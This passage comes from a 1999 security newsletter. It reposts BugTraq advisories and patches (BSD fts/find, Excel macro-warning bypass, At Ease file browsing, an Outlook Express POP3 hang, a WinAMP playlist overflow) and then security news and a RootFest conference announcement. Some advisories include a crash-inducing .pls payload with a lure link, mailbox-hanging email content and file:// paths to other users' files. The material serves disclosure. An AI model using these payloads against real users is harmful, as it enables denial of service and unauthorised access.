+ (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\
+ } \
+ (p)->fts_path = adjaddr; \
+}
+ for (p = head; p; p = p->fts_link)
+ ADJUST1(p);
+ }
/*
* If not changing directories, reset the path back to original
@@ -974,18 +992,18 @@
{
FTSENT *p;
-#define ADJUST(p) { \
+#define ADJUST2(p) { \
(p)->fts_accpath = \
(char *)addr + ((p)->fts_accpath - (p)->fts_path); \
(p)->fts_path = addr; \
}
/* Adjust the current set of children. */
for (p = sp->fts_child; p; p = p->fts_link)
- ADJUST(p);
+ ADJUST2(p);
/* Adjust the rest of the tree. */
for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) {
- ADJUST(p);
+ ADJUST2(p);
p = p->fts_link ? p->fts_link : p->fts_parent;
}
}
------------------ endpatch ----------------------------------------
--
Stas Kisel
Open Tavrical College Sysadmin stas@sonet.crimea.ua
Simferopol State University Web-designer stas@ccssu.crimea.ua
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 04:33:34 -0400
From: Jordan Ritter <jpr5@DARKRIDGE.COM>
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find
On Wed, 12 May 1999, Stas Kisel wrote:
> 2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other.
I found this back a few months ago when working on the wu-ftp stuff..
OpenBSD definitely has the same problem. last thing I remember thinking
was that it was dying because realloc() was failing (as the fts stuff
realloc()'s memory as the path grows) ..
Jordan Ritter
Network Security Engineer
Netect/Bindview Corp Boston, MA
"Quis custodiet ipsos custodes?"
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 14:37:03 +0400
From: Stas Kisel <stas@SONET.CRIMEA.UA>
To: BUGTRAQ@netspace.org
Subject: Re: fts...(improved patch)
> From: Jordan Ritter <jpr5@darkridge.com>
> OpenBSD definitely has the same problem. last thing I remember thinking
> was that it was dying because realloc() was failing (as the fts stuff
> realloc()'s memory as the path grows) ..
fts realloc (pathlen+~1000b) of memory only, so realloc succeds.
The bug is in the adjusting pointers after realloc().
Next day after sending patch I've found another circumstanses that
triggered similar bug in fts.
This time some pointers were adjusted which did not belong to realloc()-ed
memory chunk.
Improved patch is below. Sorry for inconvenience.
Probably there are some similar bugs in fts code or patch. Please let me
know if you'll see any.
\bye
Stas
----------------------------- patch ----------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999
+++ /usr/src/lib/libc/gen/fts.c Fri May 14 14:02:58 1999
@@ -740,8 +740,26 @@
* If had to realloc the path, adjust the addresses for the rest
* of the tree.
*/
- if (adjaddr)
+ if (adjaddr){
fts_padjust(sp, adjaddr);
+ /* Adjust the list, because we want to return it robust. */
+/* fix p->fts_path and p->fts_accpath
+ p->fts_accpath can be:
+ either cur->fts_path (adjust, because cur is already adjusted)
+ either p->fts_path (adjust)
+ either p->fts_name (do not adjust)
+ I'm also almost sure that in first case cur->fts_path=p->fts_path...
+*/
+#define ADJUST1(p) if((p)->fts_path != adjaddr){ \
+ if((p)->fts_a
ccpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
+ (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\
+ } \
+ (p)->fts_path = adjaddr; \
+}
+ for (p = head; p; p = p->fts_link)
+ ADJUST1(p);
+ }
/*
* If not changing directories, reset the path back to original
@@ -974,18 +992,20 @@
{
FTSENT *p;
-#define ADJUST(p) { \
- (p)->fts_accpath = \
- (char *)addr + ((p)->fts_accpath - (p)->fts_path); \
+#define ADJUST2(p) { \
+ if((p)->fts_accpath != (p)->fts_name){ \
+ (p)->fts_accpath = \
+ (char *)addr + ((p)->fts_accpath - (p)->fts_path); \
+ } \
(p)->fts_path = addr; \
}
/* Adjust the current set of children. */
for (p = sp->fts_child; p; p = p->fts_link)
- ADJUST(p);
+ ADJUST2(p);
/* Adjust the rest of the tree. */
for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) {
- ADJUST(p);
+ ADJUST2(p);
p = p->fts_link ? p->fts_link : p->fts_parent;
}
}
----------------------------- /patch ----------------------------------
------------------------------------------------------------------------------------------
Date: Fri, 14 May 1999 19:14:02 +0200
From: Przemyslaw Frasunek <venglin@GADACZKA.DHS.ORG>
Reply-To: venglin@lagoon.freebsd.org.pl
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find
> 2. This bug probably applies to FreeBSD-3.1 and ever to OpenBSD and other.
Yes, I've tested it on 3.1-STABLE.
> I have no exploit and probably will no have a free time (I think
> 3 days is more than enough) for doing it, but I beleive it is
> possible to exploit this bug using carefully designed directory
> tree to execute arbitrary commands as root during
> /etc/daily->/etc/security->find.
> REMOTE ROOT EXPLOIT (POSSIBLE).
I think, that it will be hard to write an exploit. I've tested it on
my 2.2.8-RELEASE at home.
'Find' segfaults, when it tries to do:
(void)puts(entry->fts_path);
because of junk pointer to structure 'entry'. IMHO it _always_
points to 0x200291d6, so it tries to execute (IMHO) _always_ the
same commands:
0x200291d6 <puts+34>: repnz scasb %es:(%edi),%al
0x200291d7 <puts+35>: scasb %es:(%edi),%al
0x200291d8 <puts+36>: movl %ecx,%eax
0x200291d9 <puts+37>: enter $0xd0f7,$0x89
0x200291da <puts+38>: notl %eax
0x200291db <puts+39>: rorb 0x488de455(%ecx)
0x200291dc <puts+40>: movl %edx,0xffffffe4(%ebp)
0x200291dd <puts+41>: pushl %ebp
0x200291de <puts+42>: inb $0x8d,%al
0x200291df <puts+43>: leal 0xffffffff(%eax),%ecx
0x200291e0 <puts+44>: decl %eax
0x200291e1 <puts+45>: decl 0x938de84d(%ecx)
0x200291e2 <puts+46>: movl %ecx,0xffffffe8(%ebp)
0x200291e3 <puts+47>: decl %ebp
0x200291e4 <puts+48>: call 0xc1532576 <end+2705991902>
and here it segfaults.
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
@HWA
21.0 Excel Macro Virus protection patch has a hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 13 May 1999 16:12:48 -0400
From: rotaiv <rotaiv@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Microsoft Security Bulletin (MS99-014)
-----BEGIN PGP SIGNED MESSAGE-----
This is in response to the Microsoft Security Bulletin (MS99-014).
On 3/29/99 I posted a message to BugTraq titled, "Bypassing Excel
Macro Virus Protection". The message explained two ways to bypass the
"Macro Virus Protection" option in Excel 97. One is to password
protect an infected spreadsheet (Q176640) and the second is to copy an
infected spreadsheet into the XLSTART directory (Q180614). Both
methods will open an infected spreadsheet without the macro warning
appearing.
I would love to think Microsoft Security Bulletin (MS99-014) was in
response to my email but I'll be humble and chalk it up to
coincidence. I downloaded the patch to see if addressed the two
scenarios I described above. I found that you will now receive the
macro warning on a password protected file but not on a file copied to
the XLSTART directory. Also, you can still enable or disable the
macro virus protected with a simple reg hack. I guess that is not so
important because if you can perform a reg hack, you can do a lot more
than execute an Excel macro.
I am not sure what really prompted Microsoft to release a patch for
Excel but I find it surprising that they did not address the XLSTART
option either. They should at least give us the option of deciding if
this directory is trusted, thereby by-passing the macro virus warning.
'nuff said.
rotaiv -£-
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
iQEVAwUBNzsxdQuGSvRTfa2rAQHe+Af+NXzCRMZ6ALIsiezLQ5XhOuBgmRZALeoO
k2LMkGfVea8jO7olA/wtwnrS2E0eCUVSMW23ZSxkd8Q9hbYBxbc8GvPOzOTGL4EP
tmZkyvxcB2QyyDmJjIQuJQKcGCggr0ahPNr9pvv9DsBHJeRifcS6niXZrm5uQJb7
qhY4QJzAWQ9cXEiqoNuTofgR1eg276MUSuh2Om29FIjkfcMocdGghrkQLBGvN9MB
Hlm9Z7D0I3/zT88c+A6IeyZHbe9/6PaAODgn3QuhKla8PbetyGj/Qbclua5kNR/X
tVoLWIIrcA2ZKsgQn1SLtcKTqDV5KPTGrz3yB1ZH9BJ37qmXLOegfw==
=qJ15
-----END PGP SIGNATURE-----
@HWA
22.0 Possible root compromise when installing new SSHD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 10 May 1999 22:26:19 +0200
>From: "GWDVMS::MOELLER" <moeller@gwdvms.dnet.gwdg.de>
Subject: Risks of upgrading a UNIX system
When was the last time you rebuilt all privileged (`suid root') applications
when upgrading a unix system, just in case?
I'm pretty sure one can find `small print' that demands this, however I'm
equally sure that hardly any system manager does so, since problems seem to
occur _very_ rarely. Here's a neat one:
Some time prior to the upgrade, system manager (S.M.) was asked to install
`sshd' on a not-so-common platform (nothing really security-relevant,
machine used for raw speed only, users just being accustomed to that sort of
login). Said platform (featuring a particularly elaborate user data base)
requires some special calls (simple calling sequences) to be done during
`login' - no problem, `sshd' knows about them, although not explicitly aware
of the particular hardware. Cautiously, S.M. configures `sshd' to not allow
`root' logins from the outside. What other harm could it possibly do?
Upgrade has to occur somewhat in a hurry, release documentation isn't
on-site, but procedures are known well enough. S.M. asks the manufacturer's
support representative if special precautions have to be taken, "errr, not
that I'd think so". S.M. installs new version, all fine & dandy, even
remembers to check out `sshd' afterwards and finds it to work the same as
before.
A couple of days later, S.M. logs in via `sshd' himself, and for the first
time enters `su'. Gets very amazed at the new system's intelligence, as it
knows to not ask him for a password. Minutes later, S.M. recognizes that
`su' would never ask for a password, when the parent process had been
created via `sshd' ... in spite of no other visible peculiarities with that
process.
A re-build (pretty likely boiling down to nothing but a re-link) of `sshd'
fixed the problem.
Quite a few years ago, when I saw the first mention of `ssh', I commented
"If you're a bank, you don't buy your safe at a flea market;
if you're not, you might be better off without a safe".
Maybe there's _some_ truth in it, after all.
Dr. Wolfgang J. "s."Moeller, Tel. +49 551 2011510, GWDG, D-37077 Goettingen,
F.R.Germany <moeller@gwdvms.dnet.gwdg.de> <moeller@decus.decus.de>
P.S. re "software bloat":
Imagine uSoft going open source, and no-one going to have a look at it...
[from Risks Digest 20.39]
@HWA
23.0 Apple's AtEase 5.0 security hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 13 May 1999 09:37:57 -0600
From: Tim Conrad <tconrad@KENWOOD.EDISONPROJECT.COM>
To: BUGTRAQ@netspace.org
Subject: At Ease 5.0 Security Hole
<it helps when you finish your message before hitting the 'send' button>
Hello;
At Ease 5.0 will allow a user to access any user's volume on the server.
The tested configuration is as follows:
MacOS 7.6.1 (should work with anything greater than 7)
At Ease 5.0.2
AppleShare IP 5.0.3
Netscape 4.0.7 (No reason it shouldn't work from .99 to 4.5)
How to do it.
Log in as any user that has access to Netscape Communicator, and type in
file://Macintosh%20HD/System%20Folder/ and you are able to access the disk.
Do the same thing, except use
file://At%20Ease%20Volume%20Name/At%20Ease%20%Docs/username and it's quite easy
to browse through anyones files.
It is possible to download files from that users directory. I have been unable
to actually open any of the files once they are downloaded, however in an
educational setting, just viewing names in a certian directory could constitute
some serious problems (such as if a teacher works with Special Education
studends, and has a list of documents to their parents).
Apple apparently will not fix their own product. There is a 3rd party extention
available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx
Tim Conrad
---------------------------------------------------------------------------------
Date: Fri, 14 May 1999 18:48:37 -0700
From: Vincent Janelle <malokai@GILDEA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: At Ease 5.0 Security Hole
This is not an apple problem mostly, its an MSIE problem.
Hell, is At Ease still supported? Its just a replacement finder as far as
I know, it doesn't do things like replace fs drivers and patch binaries to
stop things like that.
------------
If you have any trouble sounding condescending, find a Unix user to show
you how it's done. -Scott Adams
--http://random.gimp.org --mailto:random@gimp.org --UIN 23939474
On Thu, 13 May 1999, Tim Conrad wrote:
> Apple apparently will not fix their own product. There is a 3rd party extention
> available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx
>
>
>
> Tim Conrad
>
@HWA
24.0 Bug in Microsoft Outlook Express
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Outlook Express Win98 bug
Miquel van Smoorenburg (miquels@CISTRON.NL)
Tue, 11 May 1999 10:58:41 +0200
There is a bug in Outlook Express delivered with Windows '98, at least
version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1)
Windows '95 updated with MSIE 4.01 has Outlook Express 4.72.3612.1700,
which doesn't show the problem. OE from MSIE3 and MSIE5 don't have the
problem either. There might be versions of MSIE4 included with Windows
'98 that don't show the problem either, but I don't have a stack of
Windows CDs to test against.
We have talked to Microsoft NL about this, tracking number S2134 T6142.
However they either deny there is a bug ("sorry sir, this product has
been available for a year now so there cannot be any bugs in it") or
they do not understand what we are talking about. They also claim to
have not received any mail we sent to them, so I am giving up on that.
We did send them this bug report by fax, perhaps that technology is
stable enough to work for them, I don't know.
Description of the problem:
A dot on a single line means EOM in the POP3 protocol. If a message
contains that it must be escaped by adding an extra dot, so we have 2
dots on a single line - which is OK. However if on the TCP level the
line after this double-dot crosses over to the next packet, Outlook
Express will interpret the double-dot as a single dot, switching back to
POP3 command mode and interpreting the rest of the message as a response
from the POP3 server. Result is an error message and usually a hanging
POP3 session.
Perhaps it's not really a bug in Outlook, but the Windows I/O library
or the TCP implementation.. which is scary.
So at the TCP packet level it looks like this:
packet1: [message data]
packet1: \r\n..\r\nthis is a line that
packet2: continues in the next packet
The double-dot on the 2nd line will be interpreted as a single dot.
Include a few thousand lines like this in an email and the bug will trigger:
So
.
this
.
might
.
actually
.
cause
.
the
.
bug
.
with
.
some
.
luck
.
repeat
.
until
.
three
.
times
.
max
.
mtu
.
of
.
1500
Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?
------------------------------------------------------------------------------
Outlook Express Win98 bug, addition.
Miquel van Smoorenburg (miquels@CISTRON.NL)
Wed, 12 May 1999 10:59:46 +0200
In article <cistron.7h8rg1$eos$1@Q.cistron.nl>,
Miquel van Smoorenburg <miquels@CISTRON.NL> wrote:
>There is a bug in Outlook Express delivered with Windows '98, at least
>version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1)
[...]
>Outlook
>Express will interpret the double-dot as a single dot, switching back to
>POP3 command mode and interpreting the rest of the message as a response
>from the POP3 server. Result is an error message and usually a hanging
>POP3 session.
It occured to me that it might not be clear from the original message
but because the POP3 session is hanging, the message will not be removed
from the server and the next time mail is check the same thing will
occur. This is an effective DOS attack against the mailbox.
The only way to solve this is to remove the message with another
POP3 email program (Eudora, Pegasus) or to ask the sysadmin of the POP3
server to remove the message manually (look for a message that has a line
starting with a dot).
Upgrading to MSIE 5.0 will also solve the problem, but there is no
simple/small bugfix from Microsoft available (an MSIE 5.0 download is
what - 20 MB at least?) yet for as far as I know.
So, ISP helpdesks - take note. This is at least one of the causes of
the problems all these people have been having with their "blocked mail".
Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?
@HWA
25.0 Trivial buffer overflow DoS on WinAMP 2.x
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 13:02:43 +0200
From: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
To: BUGTRAQ@netspace.org
Subject: Buffer overflow in WinAMP 2.x
Introduction
------------
WinAMP is a popular Windows sound player with support for many file
formats (MP3, wave files, modules). It also supports MP3 streaming
(let's call it sh0utcast).
Description of the problem
--------------------------
If we tell WinAMP to open file location (Ctrl+L) which is over 256
bytes long, it'll produce nice GPF. The bug also appears when loading
playlists (.m3u and .pls)
What can we do with this bug?
-----------------------------
Many sh0utcast radios place .pls files on their websites, which contain
URL for radio's sh0utcast server.
If we'll make b00m.pls file like this...
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (about 256 A's)
and put such link...
<A HREF="b00m.pls">Techno explosion -- The Coolest MP3 Radio</A>
on our website, we can make couple of WinAMPs crash. I suppose, that
there's a possibility to put our own code in the filename (see cDc-351
for details).
Nullsoft (producer of WinAMP) has been noticed about the bug two
versions ago.
--
wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@ircnet
-----------------------------------------------------------------------
Date: Fri, 14 May 1999 15:56:28 -0400
From: William Yodlowsky <wyodlows@route1.nj.devry.edu>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x
Tested on WinAMP v2.091 on Win95A and Win95B;
v2.21 on Win98;
v1.9? and v2.21 on WinNT 4.0WS
It produced GPFs on all except WinNT, where it opened but simply didn't
play.
--Bill
<wyodlowsky@route1.nj.devry.edu>
On Wed, 12 May 1999, Wojtek Kaniewski wrote:
-----------------------------------------------------------------------
Date: Mon, 17 May 1999 03:40:48 +0100
From: Jello Biafra <biafra@X-STREAM.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x
On NT Server 4 with no Service Packs installed, this causes an
application error. Platform is a Cyrix MMX 233.
Access Violation (0xc0000005), Address : 0x62626262
@HWA
26.0 DISA limits network activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
DISA Limits Network Activity
contributed by erewhon
On April 18, the Defense Information Systems Agency (DISA) canceled all limited peacetime privileges including
internet and email usage in an effort to bolster the amount of communications bandwidth. This will prevent
all unofficial Internet traffic on the European Command's Common User Data Network (CUDN). The Army's 5th
Signal Command has been tasked with monitoring the network for violations of this policy. One civilian
employee has reportedly already been fired for surfing for up to 13 hours on two separate occasions. This
order is also designed to limit "push" technologies and large email attachments.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-lock-5-17-99.html
MAY 17, 1999 . . . 17:55 EDT
U.S. European Command locks down Internet
Access
BY DANIEL VERTON (dan_verton@fcw.com)
HEIDELBERG, Germany -- To bolster the amount of communications
bandwidth, the U.S. Army and Air Force have significantly curtailed the
personal use of the Internet by servicemen under the European Command,
including those deployed in the Balkans.
The Defense Information Systems Agency's European field office began an
effort to increase by 30 percent the available communications services of the
Defense Information Systems Network throughout the European theater to
support NATO's humanitarian and combat missions in Yugoslavia. Hoping to
free up needed bandwidth, the Army and Air Force on April 18 issued the
policy, which canceled all limited peacetime privileges granted to government
and military employees to use government computer systems, particularly e-mail
and the Internet, for personal use. The policy will remain in effect for up to one
year from the date it was issued.
"Our ability to support and sustain classified and unclassified e-mail capability
for current operations...is affected by the available bandwidth on the" European
Command's Common User Data Network (CUDN), according to the
memorandum. "For that reason, it is imperative that [U.S. Army Europe]
establish a minimize order immediately to all secure and non-secure network
subscribers. Effective immediately, no unofficial Internet traffic may occur on
the CUDN until [the] minimize [order] is lifted."
The memo specifically directs the Army's 5th Signal Command to actively
monitor the network for violations of the policy. It also calls on local unit
commanders to brief all their personnel and to "routinely check on user activity"
for evidence of inappropriate use of government computers. One civilian
government employee has been dismissed based on evidence that he had visited
inappropriate Web sites on two separate occasions, totaling up to 13 hours of
Web surfing. The military services also have curtailed the use of "push"
technologies for continuous news feeds and the attachment of large files to
e-mails.
The policy allows, however, some leeway for appropriate use of the Internet in
support of morale, welfare and recreational activities, such as providing soldiers
and airmen deployed in Albania, Macedonia and elsewhere with links to family
members in the United States.
In addition to slowing down the network, "personal use of Internet services
provides a conduit through which information assurance and security can be
compromised," according to a spokesman for the Army's European Command.
"Our information dominance depends on it, and we are running out of pipes."
@HWA
27.0 Money in the bank is an intangible?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
HACKER'S PARADISE
by BHZ, Monday 17th May 1999 on 10:08 pm CET
Looks like after Norway hackers could find their paradise in New Zaeland. Law
Commission has acknowledged that it is not against the law for a hacker to break
into a New Zealand bank's computer system and transfer funds into his or her own
bank account. "There cannot be theft under section 220, Crimes Act 1961, of an
intangible thing. In (a recent Court of Appeal case) the court held that the definition in
section 217 is confined to tangible things and does not extend to ... a credit in a bank
account." Read the article on InfoWar.
http://www.infowar.com/hacker/99/hack_051799b_j.shtml
Hacker Sitings and News
5/17/99
New Zealand: Urgent Action Wanted To Protect Banks From Hacking.
THE Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer
funds into his or her own bank account.
In a report on computer crime, the commission says that under section 220 of the Crimes Act 1961 it is not against the law to steal something intangible.
"There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in
section 217 is confined to tangible things and does not extend to ... a credit in a bank account."
The Network of Internet Related Organisations is pushing for urgent changes to legislation to protect banks and other organisations from the effects of
hackers.
Spokesman Chris Patterson, a solicitor with Hesketh Henry, said it was an understatement to say electronic security in New Zealand was a huge problem.
Mr Patterson said Niro believed an amendment to the Crimes Act should be passed by the Government immediately to stop cyber-criminals.
The Law Commission has recommended that there be four new offences dealing specifically with computer misuse. They are: unauthorised interception of
data stored in a computer; unauthorised accessing of data stored in a computer; unauthorised use of data stored in a computer; and unauthorised damaging
of data stored in a computer.
Justice Minister Tony Ryall said he planned to introduce a draft bill including the first three offences by the end of next month. But he said the offence of
hacking raised more complex issues and would need further consultation before legislation on that was drafted.
THE DOMINION 14/05/1999
@HWA
28.0 r00tfest is coming soon, with some heavyweights planning to attend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Who; The computer underground, security professionals, IT managers, feds, system administrators, and anyone else
who would like to learn more about security.
+ What; A computer security conferece that will have speakers, vendors, door prizes, contests, events and more.
+ When; May 21-23, 1999
+ Where; Smack in the middle of North America, in Minneapolis Minnesota at the Minneapolis Convention Center, room 103.
+ Why; To expand you computer security knowledge, visit the famous Mall of America, meet many of the people face to face that you've
been talking with over the internet, meet new friends and contacts, and get away from your job for a couple days.
+ Cost; - $40 at the door. More info at www.rootfest.org
RootFest '99 Speakers
Bruce Schneier - Topic To Be Announced.
Mr. Schneier is the president of Counterpane Systems, and the inventor of the Blowfish algorithm. He is the author of Applied Cryptography,
The Electronic Privacy Papers, and E-Mail Security. Mr. Schneier has given talks at DefCon, and the Black Hat Briefings.
Steve Stakton (Optiklenz) - Cisco PIX Firewall Security Analysis
Optiklenz is the founding member of the Legions of the Underground, and their newly formed Legions Interactive. He is a frequent editor and
contributor to the LoU ezine, Keen Veracity.
Adam L. Beberg - Software Development for a Hostile Internet
Adam L. Beberg is the founder and president of Distributed.net, founded in 1997 as a gathering point for research and projects related to
distributed computing. Adam is currently working on Cosm, a protocol for large scale distributed computing.
Mike Roadancer - "Hacker - It's not a Dirty Word" Hackers in the workplace.
Mike Roadancer is the president of the Hacker's Defense Foundation.
Brian Ristuccia - Circumventing Censorware, Filtering Proxies, and Government Firewalls.
Mr. Ristuccia is the author of the Internet Alternate Namespace proxy server software and operator of the Anti-Censorware Proxy. He is a
University of Massachusetts Computer Science Undergraduate and an employee of Nortel Networks.
Peter Shipley - The results of a 3 year effort multi-modem wardialing on a massive scale. Security problems occur when obvious security
problems are overlooked. One commonly overlooked problem is alternative access methods to a corporate Intranet from an external machine.
Many if not most companies are overlooking their secondary vulnerabilities surrounding alternate methods of network access. The results of
the completed survey will be analyzed summarized along with lessons and techniques learned.
Mr. Shipley is an consultant in the San Francisco's Bay Area with over thirteens years experience n the Computer Security field. Currently
working for KPMG LLP. out of the San Jose/Silicon Valley office with the title of "Chief Security Architect". Mr. Shipley is one of the few
individuals who is well known and respected in the professional world as well as the underground/hacker community. He has extensive
experience in system and network security as well as programming and project design. Mr. Shipley's past accomplishments include first in
depth research into the security aspects of wardialing, designing and implanting the first automated network security scanner, among other
accomplishments. Mr. Shipley's specialties are third party penetration testing and firewall review, computer risk assessment, and security
training. Mr. Shipley also performs post-intrusion analysis as well as expert witness testimony.
Paul McNabb - Trusted Operating Systems Technology in Web-based Computing
Mr. McNabb is the CTO and vice president of Argus Systems Group, Inc. and has over ten years of in-depth experience in the design,
development, documentation and testing of secure operating systems and networks. He has also performed security consulting and seminars
for various military, government, university and industry groups in numerous countries.
Brenno J.S.A.A.F. de Winter - Internet Security in Europe: State of Affairs.
Brenno de Winter is the president of De Winter Information Solutions, based in the Netherlands. He has years of experience in development,
risk assessment and security. He is a involved in the development and consultacy of web-based fuctions and security, and is currently the
project leader in end-to-end testing of digital television equipment for Philips (focused on conditional access)
DataShark - All about TEMPEST monitoring
DataShark is a U.S. hacker from the famed Legions of the Underground hacking group. He plans on having a working TEMPEST/van Eck
monitoring station in time for RootFest.
Richard Thieme - Cancelation: Date conflict. Look for Mr. Thieme at RootFest 2K.
Bill Campbell - Biometrics: Opportunity and Challange
Bill Campbell is Principal Consultant with Eagle's Reach, an independant information security and technology risk management firm
headquartered in the Boston area. He was previously Director of Information Security Engineering with Fidelity Investments, and has over 15
years experience in technical security, software development, operations support, and quality assurance in both the private and public sectors.
(Eagle's Reach does not develop, market or sell biometric products.)
GloiDemon - Vector-based Super Hashing, Middle East State of Affairs
GloiDemon is a hacker from Kuwait
Winn Schwartau - Time-based Security (via video conference)
Winn Schwartau is the leading authority on Information Warfare. His sites, Infowar.com and Info-Sec.com are some of the most popular
security sites on the 'net. He has published many books, including Information Warfare: Chaos on the Electronic Superhighway, and his
new book, Time Based Security, the opening chapters of which can be found here. He has given talks at Black Hat, and DefCon.
John Kozubik - Intrusion Detection Systems
John Kozubik has over four years experience in the network security field, and is currently working on VPN's, wireline encryption, and
operational Intrusion Detection. He writes a monthly NT security column, available at NetworkCommand, and has written several white
papers on Intrusion Detection, Decoy Networks, and Disaster Recovery.
From http://www.403-security.net/
RootFest elite security conference
Astral 13.05.1999 18:45
RootFest is a computer security convention and conference being held in Minneapolis, Minnesota, USA. As far as
I know, it's the first of its kind in the whole Midwest. We welcome all computer security professionals, the
computer underground, hackers, IT professionals, government agents, feds, MIB, and anyone who would like to
come learn about computer security.Chech their webiste RootFest.
http://www.rootfest.org
From http://www.net-security.org/
ROOTFEST IS CLOSE
by BHZ, Friday 14th May 1999 on 1:01 pm CET
Rootfest is coming. It is a security conference held in Minneapolis (USA), which will
be very "elite" this year. Many security professionals are coming to give a speech.
The dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on
the State of Affairs in Europe. He did some research and the results are disturbing.
Read his article called Robustness of data security is poor.
Just to inform our readers that HNS will have a detailed special report on Rootfest.
PRESS ANNOUNCEMENT
Robustness of data security is poor
General
From May 21st till May 23rd a computer security conference, called Rootfest will be held in Minneapolis (USA). At this conference security specialists, the "hacking"
society, IT professionals, United States government agents and FBI will come together to discuss computer security. The dutch Brenno de Winter, owner of De Winter
Information Solutions, will speak on the State of Affairs in Europe. For this conference he did some basic research. The results are disturbing.
About Rootfest
Almost anywhere in the world people are becomming aware of the fact that computer crimes are a potential and present danger to our society. Last year Bill Clinton
spoke about terrorism moving more towards the computer. With the danger in mind a conference has been organised. At this conference hackers, FBI, police officials,
governments, computer specialist and IT security professionals join forces and will focus together on the same problem. Currently somewhere between 600 and 900
attendees are expected to come.
State of Affairs in the Netherlands
Every day more and more is written about e-commerce (electronic sales through the internet). In the Netherlands the internet is pushed by the government in the SWAP
2000 project. SWAP 2000 is an effort to reduce the gap between the Netherlands and the USA in technology. Computer crimes are a real threat to the growth of
technology.
The test
The main target was to use a medium that is widely spread and where basic security is simple and cheap. So e-mail was choosen. An artifact of e-mail is that quite
often virusses get spread through e-mail (in this context one can think of the very recent Melissa-virus). Since the target was getting an general impression on secure
e-mail 39 dutch organisations have been mailed. These organisation were insurance companies, banks, 12 major ICT companies, 8 government organisations, 4 political
parties. Important was that the organisation needs to be have reasons to receive confidential documents or the organisation delivers internet-related systems (ICT
companies -> they need to indicate the secure way). The e-mail first briefly indicated that sending data per e-mail could mean a risk and then asked what method could
be used to send an secure e-mail (encryption). Remark: e-mails are basically letters that are sent out without an envelope. By using encryption this envelope is provided
for the e-mail. E-mails can be easily intercepted and thus read. This can lead to confidential data becomming public. Also without encryption it is very easy to send mail
using somebody elses indentity. By using encryption signatures can be checked.
Results
When an response came to the request, the answer was noted. When was stated that e-mail was used for informal communiction only that was accepted as a proper
solution (because sensitive data was sent by other means). When no response was given, there is a major change that people start sending the sensitive data without any
security measures. So this was regarded as no solution available. No bank or insurcance company has a policy on secure e-mail. One insurance company mailed that
they couldn't (of course) inform me on this issue out of security considerations. Only two out of twelve ICT companies had a way of using secure e-mail. Most
government organisations only used e-mail as an informal way of communication and thus reduced the risk. One unforutnate thing is the police west-veluwe vallei in the
Netherlands that allows people to press charges by e-mail. They use e-mail formally and use not secured forms and thereafter not secured e-mail (although they wrote
they were considering there options).
Other facts
Also attention has been paid to the security on laptops. Laptops contain programs and data. This data ought to be encrypted. So if a laptop is stolen no data becomes
available. Last year a police team LRT (national detective team) had a laptop that was stolen out of a police building. All data (snitches, cases under investigation)
became known. This data was handed to the press. Encryption to prevent this is easy and cheap to get. However less dan 7% of the companies checked were
protecting their data.
Finally
The several small investigation show, according to Brenno de Winter, that the awareness on data security is way below acceptable point. This may easily lead to major
incidents in the future, setting back usage for internet and other ICT solutions. However basic security is often freely available.
About Brenno de Winter
Brenno de Winter, 27, is CEO of De Winter Information Solutions. De Winter Information Solutions is a company that focusses on software development, consultacy
and Internet solutions and security. Brenno has been programming since he was twelve years old and working on the internet since 1992. In the so-called Open Source
community he is active in several freeware projects, among the freeware encryption GnuPG.
Further information
If you would like further information you can contact: Brenno de Winter. E-mail: brenno@dewinter.com phone: +31 6-53 53 6508 fax: +31 318-652913. On the internet
http://www.dewinter.com
For secure e-mail you can find the PGP-public key on http://www.dewinter.com/secure.html
For further information on Rootfest you can go to http://www.rootfest.org
Some examples on how easy it is to attack security can be shown upon request.
@HWA
